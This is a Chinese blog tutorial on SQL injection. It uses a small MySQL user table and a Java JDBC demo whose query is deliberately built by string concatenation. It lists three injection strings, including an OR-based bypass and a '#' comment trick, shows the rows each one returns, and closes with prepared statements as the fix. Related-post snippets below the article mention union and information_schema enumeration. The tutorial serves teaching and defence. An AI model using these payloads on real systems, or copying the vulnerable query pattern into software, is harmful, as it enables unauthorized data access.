mysql中注入演示_SQL注入(案例演示)

最新推荐文章于 2023-05-21 23:32:45 发布
最新推荐文章于 2023-05-21 23:32:45 发布
阅读量229 收藏 2
点赞数
文章标签: mysql中注入演示
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30921875/article/details/113284823
版权

SQL注入(案例演示)

一、SQL注入是什么?

在程序事先定义好的 查询语句中添加额外的SQL语句 ,在管理员不知情的情况下实现非法操作,以此来实现 欺骗数据库服务器执行非授权的任意查询 ,从而进一步得到相应的数据信息。

SQL注入通俗说就是:

通过SQL语句找到破绽,进行非法的数据读取。

二、实现步骤

说明:

用一个简单的查询案列说明 SQL 注入

案例使用的为:Java语言与MySQL数据库

1.新建数据表

1.新建一个数据表并添加几条数据

# 新建表

CREATE TABLE `user` (

`user_name` varchar(255),

`password` varchar(255)

) ENGINE=InnoDB DEFAULT CHARSET=utf8;

# 向表中添加数据

INSERT INTO `user` VALUES ('zhangsan', '123456');

INSERT INTO `user` VALUES ('1', '2');

INSERT INTO `user` VALUES ('1', '1');

INSERT INTO `user` VALUES ('1', '3');

此时数据库的数据为下图所示:

d1b386b683f309dd7f9d28b3fbf7f86b.png

2.SQL注入分析

1.定义SQL语句

可以看出在参数userName和password 的部分SQL语句是传递的字符串,也就是说可以传递任意内容

String sql = "select * from user where user_name = ' " + userName + "' and password = ' " + password + " ' ";

2.设置userName和password参数值

通过参数userName的传值来演示获取非法数据

将userName的值分为四种情况,password 的值在这四种情况下都为固定值 1

合法参数获取数据

String userName = "1";

String password = "1";

传递参数后SQL语句变为:

select * from user where user_name = '1' and password = '1'

此时可从数据库中读取出一条数据:

273e6fa32ef558c640c278b02797c217.png

非法参数获取数据(1)—— 掌握一部分信息即可获取到其它信息

String userName = "1' or password = '";

String password = "1";

传递参数后SQL语句变为:

select * from user where user_name = '1' or password = '' and password = '1'

此时可从数据库中读取出三条数据:

f7d935dfbb58c9032277c96c3a402a1c.png

非法参数获取数据(2)—— 什么都不需要即可获取所有信息

String userName = "' or user_name like '%%' or password = '";

String password = "1";

传递参数后SQL语句变为:

select * from user where user_name = '' or user_name like '%%' or password = ''and password = '1'

此时可从数据库中读取出四条数据:

a19abd98d4a52338adc727712f35e09e.png

非法参数获取数据(3)—— 利用#注释掉多余SQL

String userName = "' or user_name like '%%' # or password = ' ";

String password = "1";

传递参数后SQL语句变为:

select * from user where user_name = '' or user_name like '%%' # or password = ' and password = '1'

此时可从数据库中读取出四条数据:

a19abd98d4a52338adc727712f35e09e.png

3.代码案例

1.新建一个User实体类

【说明】

如果不使用lombok的@Data注解,需要添加set get方法和toString方法

@Data

public class User {

private String userName;

private String password;

}

2.新建Demo类,体验SQL注入

public class Demo {

public static void main(String[] args) throws Exception{

// String userName = "1"; // 正常操作

// String userName = "1' or password = '"; // 掌握丢丢信息就可以获取其它信息

// String userName = "' or user_name like '%%' or password = '"; // 什么都不需要就可拿到所有信息

String userName = "' or user_name like '%%' # or password = ' "; // 升级版

String password = "1";

// 加载数据库驱动

Class.forName("com.mysql.jdbc.Driver");

// 创建数据库连接

Connection conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/user表所在的数据库名?" +

"characterEncoding=utf-8&useUnicode=true","root","123456");

// 定义SQL语句

String sql = "select * from user where user_name = '" + userName + "' and password = '" + password + "'";

// 打印出拼接后的SQL语句

System.out.println(sql);

// 创建SQL执行对象

Statement stmt = conn.createStatement();

// 执行SQL语句并返回结果集

ResultSet rs = stmt.executeQuery(sql);

// 遍历出结果集到List集合

List userList = new CopyOnWriteArrayList<>();

while (rs.next()) {

User user = new User();

user.setUserName(rs.getString(1));

user.setPassword(rs.getString(2));

userList.add(user);

}

// 打印结果集

for (User user : userList) {

System.out.println(user);

}

}

}

三、防止SQL注入的方式

SQL预编译(Java提供了PreparedStatement类)

校验参数(使用正则表达式等)

紫晶矿工
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL解决SQL注入的另类方法详解
09-10
主要介绍了MySQL解决SQL注入的另类方法,结合实例形式列举分析了几种防止SQL注入的技巧,具有一定参考借鉴价值,需要的朋友可以参考下
PHP+MysqlSQL注入源码 下载
03-21
PHP+MysqlSQL注入源码、下载解压部署到环境去就行了。
mysqlsql注入
清风微醺的博客
04-18 2338
sql注入攻击实例mysql_SQL注入攻击案例 SQL注入案例 所谓的sql注入本质上还是执行sql语句 检测注入点 判断是否存在sql注入可能 判断当前表有多少字段 利用order by n select * from tag order by 2; order by n以第n个column排序,如果n大于表字段个数会报错。 SQL注入常用爆库语句 爆库 SELECT * FROM `tag` where id = 3 union select 1,database(); 查询informat
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1597
MYsQL5.0以上版本Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
SQL注入攻击实战演示(附源码)
hack0919的博客
03-31 4179
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界最普遍的漏洞之一。
小白学习篇:MYSQL手工注入之多种类多姿势剖析(上)
最新发布
weixin_64683116的博客
05-21 402
sql手工注入
一文带你学习SQL注入
大河之犬的博客
12-21 5295
但需要注意的是,存储过程也可能会存在注入问题,因此应该尽量避免在存储过程内使用动态的SQL语句。如果无法避免,则应该使用严格的输入过滤或者是编码函数来处理用户的输入数据。下面是一个在Java调用存储过程的例子,其
MySQL.rar_MYSQL_mysql 演示
09-21
mysql演示程序。实现了数据库的各种功能。对初学数据库的人来说很有用。
mysql_cn_sc.rar_mysql 文_mysql手册_sql mysql
09-14
Mysql文手册
sql.rar_MYSQL_MYSQL ppt_sql 练习
09-14
MYSQL数据库的介绍,并且有练习,学习了它能够快速的掌握这门数据库
SQL.rar_labview mysql_mysql labview_sql
09-21
在labview实现数据库MySQL调用的节点函数
mysql sql注入例子_sql注入的各种实例情况
weixin_42718924的博客
02-05 653
/////////////////////////////////////命令注入攻击:使用的是system函数执行windows系统dir命令,来显示URL参数dir所指定的子目录的内容。 可以使用escapeshellarg函数来处理命令的参数,防止URI来进行命令注入攻击使用的是passthru函数执行windows系统命令,读取URL参数username所指定的来访者账号,并显示来访者...
SQL注入MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 1875
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
mysql注入典例,MySQl注入实例教程
weixin_36139471的博客
03-24 161
20and%20table_name%20!=%200x7365745F73746F636B%20and%20table_name%20!=%200x7368697070696E675F64657374696E6174696F6E%20and%20table_name%20!=%200x7368697070696E675F64657374696E6174696F6E5F70726F66696C65...
mysql sql注入例子_SQL注入的实际案例
weixin_39723010的博客
02-05 906
发动SQL注入要做的三件事确定Web应用程序所使用的技术为了确定所采用的技术,攻击者可以考察Web页面的页脚,查看错误页面,检查页面源代码,或者使用诸如Nessus、AWVS、APPSCAN等工具来进行刺探。确定所有可能的输入方式一般来说,所有HTTP的GET和POST都应当作用户输入。为了找出一个Web应用所有可能的用户输入,我们可以求助于Web代理,如Burp等。查找可以用于注射的用户输入在找...
MySQLSQL注入及解决
weixin_47543906的博客
11-23 879
Statement的子接口PreparedStatement PreparedStatement预编译执行者对象 预编译:SQL语句在执行前就已经编译好了,执行速度更快。 安全性更高:没有字符串拼接的SQL语句,所以避免SQL注入的问题 代码的可读性更好,因为没有字符串拼接
mysqlsql注入
why is this
12-02 538
防护归纳一下,主要有以下几点: 1.永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和双"-"进行转换等。 2.永远不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取。 3.永远不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接。 4.不要把机密信息直接存放,加密或者hash掉密码和
SQL注入案例演示与防范措施大全
热门推荐
乱世刀疤
02-26 1万+
SQL注入攻击案例与应对措施。
SQL注入MYSQL注入
av11566的博客
04-19 6961
前言 MYSQL注入首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库符号"
什么是SQL注入并用代码演示
05-19
SQL注入是一种攻击技术,攻击者会利用应用程序未经过滤的用户输入来修改或篡改数据库的数据。攻击者会在输入框输入一些恶意的SQL代码,通过执行这些代码来获取敏感信息或者修改数据库的数据。下面是一个简单的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值